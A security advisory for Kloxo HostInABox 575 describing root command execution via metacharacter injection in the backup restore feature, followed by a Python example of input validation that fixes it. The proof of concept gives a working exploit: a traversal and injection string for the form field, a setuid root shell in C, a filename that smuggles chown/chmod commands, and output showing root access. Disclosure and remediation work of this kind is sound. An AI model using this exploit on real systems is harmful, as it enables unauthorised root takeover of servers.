Kloxo HostInABox 575 - shell invocation, local command execution as root



DESCRIPTION


Metacharacter injection in the backup feature allows local users to execute commands as root.



IMPACT


Local users could obtain root privileges.


PROOF OF CONCEPT


1. Log into Kloxo
2. Click "Backup Home"
3. In the field labeled "Backup From File", type: ../../../../../../../../tmp/;cd ..;chown root.root shell;chmod 4755 shell;
4. In the shell, issue the following commands:
[user1@testing574 ~]$ cd /tmp
[user1@testing574 /tmp]$ cat>shell.c<<EOF
#include <stdlib.h>
#include <unistd.h>
int main(){
  setgid(0);
  setuid(0);
  system("/bin/bash");
  return 0;
}
EOF
[user1@testing574 /tmp]$ gcc shell.c -o shell
[user1@testing574 /tmp]$ touch ';cd ..;chown root.root shell;chmod 4755 shell;'
5. Back in Kloxo, click "Start Restore Process"

Now the local, unprivileged user has a suid root helper shell:

[user1@testing574 tmp]$ ls -al
total 28
drwxrwxrwt  4 root  root  4096 May 21 08:41 .
drwxr-xr-x 24 root  root  4096 May 19 16:57 ..
-rw-rw-r--  1 user1 user1    0 May 21 08:40 ;cd ..;chown root.root shell;chmod 4755 shell;
drwx------  2 root  root  4096 May 21 08:41 backupPdUzR4
-rwsr-xr-x  1 root  root  5056 May 21 08:41 shell
-rw-rw-r--  1 user1 user1   89 May 21 08:33 shell.c


[user1@testing574 /tmp]$ ./shell
[root@testing574 /tmp]# id
uid=0(root) gid=0(root)
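The defensive counterpart to the injection described above, added here as an example (not Kloxo's code): the "Backup From File" value is checked against an allowlist, confined to the backup directory, and passed as a single argv element instead of being interpolated into a shell string. The backup directory and the tar-based restore command are assumptions.

```python
import os
import re

# Allowlist for a backup file name: no '/', no ';', no leading '.', so
# neither traversal nor shell metacharacters can slip through.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


def vulnerable_command(backup_dir, user_input):
    """The pattern the advisory exploits: the form value is spliced into a
    shell string, so ';' ends the intended command and '../' walks out of
    the backup directory. Returned for inspection only; never executed."""
    return f"tar -xzf {backup_dir}/{user_input}"


def is_safe_backup_name(user_input):
    """True when the whole value matches the allowlist."""
    return SAFE_NAME.fullmatch(user_input) is not None


def safe_backup_path(backup_dir, user_input):
    """Return an absolute path inside backup_dir for a validated file name.

    Raises ValueError for disallowed characters or a path that resolves
    outside backup_dir (second line of defence behind the allowlist).
    """
    if not is_safe_backup_name(user_input):
        raise ValueError("backup file name contains disallowed characters")
    base = os.path.realpath(backup_dir)
    target = os.path.realpath(os.path.join(base, user_input))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("backup file resolves outside the backup directory")
    return target


def restore_argv(backup_dir, user_input):
    """Build the restore command as an argv list for subprocess.run (no
    shell): the file name is one argument whatever characters it holds.
    'tar -xzf' is an assumed restore command, not Kloxo's."""
    return ["tar", "-xzf", safe_backup_path(backup_dir, user_input)]
```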